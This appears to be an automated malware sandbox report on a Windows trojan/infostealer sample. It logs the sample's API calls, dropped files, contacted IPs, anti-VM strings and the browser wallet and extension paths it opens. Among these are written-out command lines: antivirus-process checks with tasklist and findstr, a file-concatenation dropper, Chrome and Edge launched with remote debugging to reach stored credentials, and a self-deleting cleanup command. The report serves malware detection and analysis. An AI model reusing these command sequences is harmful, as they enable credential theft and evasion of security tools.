                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.7:49710 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49711 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49717 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49736 version: TLS 1.2
                Source: unknown HTTPS traffic detected: 94.130.191.168:443 -> 192.168.2.7:49737 version: TLS 1.2
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C8F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C8F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00CA9FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C84763: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C71B4D LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe Code function: 0_2_004038AF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C7F20D ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe File created: C:\Windows\BwBroadcasting
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe File created: C:\Windows\DenseCrisis
                Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\325114\Miniature.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: String function: 00C2FD52 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: String function: 00C30DA0 appears 46 times
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe Code function: String function: 004062CF appears 57 times
                Source: pM3fQBuTLy.exe Static PE information: invalid certificate
                Source: pM3fQBuTLy.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@89/293@21/18
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C841FA GetLastError,FormatMessageW
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C72010 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C71A0B AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C7DD87 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe Code function: 0_2_004024FB CoCreateInstance
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Code function: 16_2_00C83A0E CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\HHTG6LYI.htm
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6240:120:WilError_03
                Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe File created: C:\Users\user~1\AppData\Local\Temp\nsg348A.tmp
                Source: pM3fQBuTLy.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe File read: C:\Users\desktop.ini
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: chrome.exe, 00000015.00000002.1724366438.0000010400668000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                Source: VKNG4E3OZ.16.dr, VS0RQIWB1.16.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: pM3fQBuTLy.exe Virustotal: Detection: 9%
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe File read: C:\Users\user\Desktop\pM3fQBuTLy.exe
                Source: unknown Process created: C:\Users\user\Desktop\pM3fQBuTLy.exe "C:\Users\user\Desktop\pM3fQBuTLy.exe"
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Cotton Cotton.cmd & Cotton.cmd
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 325114
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Grocery" Pink
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Through + ..\Aspects + ..\Except + ..\Prevention d
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Miniature.com d
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2432,i,10762324331143125605,3752248268113785829,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3
                Source: unknown Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6048 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6540 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com" & rd /s /q "C:\ProgramData\C2VKNO8Q1DJM" & exit
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=1092 --field-trial-handle=2072,i,16985529040593528638,3036961264091267844,262144 /prefetch:8
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2708 --field-trial-handle=2508,i,6938199240973265480,1311617046375224324,262144 /prefetch:3
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe Section loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, iconcodecservice.dll, windowscodecs.dll, riched20.dll, usp10.dll, msls31.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll, textshaping.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll, cmdext.dll, apphelp.dll
                Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: dbghelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: windows.fileexplorer.common.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
                Source: Window Recorder, Window detected: More than 3 window changes detected
                Source: pM3fQBuTLy.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe, Code function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress
                Source: pM3fQBuTLy.exe, Static PE information: real checksum: 0xdda67 should be: 0xe2f0a
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C3264F push ds; ret 16_2_00C3266E
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C30DE6 push ecx; ret 16_2_00C30DF9

                Persistence and Installation Behavior

                Source: C:\Windows\SysWOW64\cmd.exe, File created: C:\Users\user\AppData\Local\Temp\325114\Miniature.com

                Boot Survival

                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe, Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00CA26DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C2FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\cmd.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\tasklist.exe, Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Process information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_16-103834)
                Source: Miniature.com, 00000010.00000002.2122589934.0000000000171000.00000040.00001000.00020000.00000000.sdmp, Binary or memory string: %HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, API coverage: 3.7 %
                Source: C:\Windows\SysWOW64\timeout.exe TID: 1312, Thread sleep count: 91 > 30
                Source: C:\Windows\System32\conhost.exe, Last function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, File Volume queried: C:\ FullSizeInformation
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe, Code function: 0_2_00406301 FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\pM3fQBuTLy.exe, Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C7DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C8A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C8A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C7E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C8A570 FindFirstFileW,Sleep,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C866DC FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C4C622 FindFirstFileExW
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C873D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C87333 FindFirstFileW,FindClose
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C7D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, Code function: 16_2_00C15FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.com, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                Source: chrome.exe, 00000015.00000002.1724667327.0000010400708000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: VMware
                Source: Web Data.26.dr, Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Web Data.26.dr, Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: chrome.exe, 00000015.00000002.1728868685.0000010401198000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: VMware Virtual USB Mouse
                Source: Web Data.26.dr, Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: Web Data.26.dr, Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
